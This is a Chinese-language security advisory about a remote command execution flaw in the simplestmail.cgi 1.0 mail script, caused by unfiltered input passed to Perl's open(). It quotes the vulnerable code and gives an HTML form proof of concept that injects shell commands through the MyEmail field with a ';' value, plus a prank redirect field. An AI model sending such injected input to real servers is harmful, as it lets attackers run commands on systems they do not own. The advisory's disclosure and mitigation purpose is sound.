首页 -> 安全研究

安全研究

安全漏洞
simplestmail.cgi 可远程执行命令

发布日期:2000-12-14
更新日期:2000-12-14

受影响系统:

Leif M. Wright simplestmail.cgi 1.0 for unix
描述:

Leif M. Wright(http://www.conservatives.net/atheist/scripts/index.html?Download&simplestmail)编写的simplestmail.cgi是一个用来处理来自web表单的
email回应的工具,它对输入进行合法性检查时存在一个漏洞。

由于在调用open( )函数时未能正确地从用户提供的输入中过滤掉shell元字符,结果攻击者可
以使该脚本以web服务器的权限执行任意shell命令。

有问题的代码如下:
$youremail = $contents_by_name{'MyEmail'};
open (MAIL, "|$mailprog $youremail") || die "Can't open $mailprog!\n";

   
<*来源:rpc (h@ckz.org) *>




测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


<html>
<form action="http://someplace/cgi-bin/simplestmail.cgi" method=POST>
Command: <input type=text name=MyEmail value=";">
<input type=hidden name=redirect value="http://goatse.cx">
<input type=submit name=submit value="run">
</form>
</html>



建议:

临时解决办法:

    NSFOCUS建议您自行修改该CGI脚本,增加对shell命令和元字符的过滤。

厂商补丁:

    暂无。


浏览次数:5429
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障